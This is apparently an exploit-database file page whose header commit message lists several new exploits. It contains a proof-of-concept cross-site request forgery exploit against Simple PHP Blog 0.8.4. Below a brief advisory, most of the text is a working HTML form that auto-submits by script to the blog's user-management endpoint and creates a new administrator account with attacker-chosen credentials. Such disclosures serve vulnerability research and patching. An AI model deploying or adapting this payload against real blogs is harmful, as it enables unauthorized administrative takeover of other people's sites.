cda049fa54
4 new exploits MLM Unilevel Plan Script v1.0.2 - SQL Injection MLM Unilevel Plan Script 1.0.2 - SQL Injection Comodo Dragon Browser - Unquoted Service Path Privilege Escalation Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin) Entrepreneur Job Portal Script - SQL Injection BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation Waves Audio Service - Unquoted Service Path Privilege Escalation
66 lines
2.2 KiB
Text
Executable file
66 lines
2.2 KiB
Text
Executable file
<!--
|
|
|
|
=========================================================================================================
|
|
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
|
|
=========================================================================================================
|
|
|
|
# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
|
|
Admin)
|
|
# Author: Besim
|
|
# Google Dork: -
|
|
# Date: 07/10/2016
|
|
# Type: webapps
|
|
# Platform : PHP
|
|
# Vendor Homepage: http://simpleblogphp.com/
|
|
# Software Link: https://sourceforge.net/projects/sphpblog/
|
|
# Version: 0.8.4
|
|
# Tested on: Ubuntu 14.04.5
|
|
|
|
Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
|
|
in place)
|
|
meaning that if an admin user can be tricked to visit a crafted URL created
|
|
by
|
|
attacker (via spear phishing/social engineering), a form will be submitted
|
|
to (*http://localhost/simple/manage_users.php?action=update&type=new
|
|
<http://localhost/simple/manage_users.php?action=update&type=new>*) that
|
|
will add a new user as administrator.
|
|
|
|
Once exploited, the attacker can login to the admin panel
|
|
(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
|
|
using the username and the password he posted in the form.
|
|
|
|
*CSRF PoC Code*
|
|
=============
|
|
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="
|
|
http://localhost/simple/manage_users.php?action=update&type=new"
|
|
method="POST">
|
|
<input type="hidden" name="sUsername" value="Besim" />
|
|
<input type="hidden" name="sFullname" value="Besim" />
|
|
<input type="hidden" name="sPassword" value="mehmet" />
|
|
<input type="hidden" name="sEmail" value="mehmet@yopmail.com"
|
|
/>
|
|
<input type="hidden" name="sAvatar" value="" />
|
|
<input type="hidden" name="sActive" value="on" />
|
|
<input type="hidden" name="sModComments" value="on" />
|
|
<input type="hidden" name="sDeleteEntries" value="on" />
|
|
<input type="hidden" name="sEditAny" value="on" />
|
|
<input type="hidden" name="submit" value="Create User" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
|
|
|
|
--
|
|
|
|
Besim ALTiNOK
|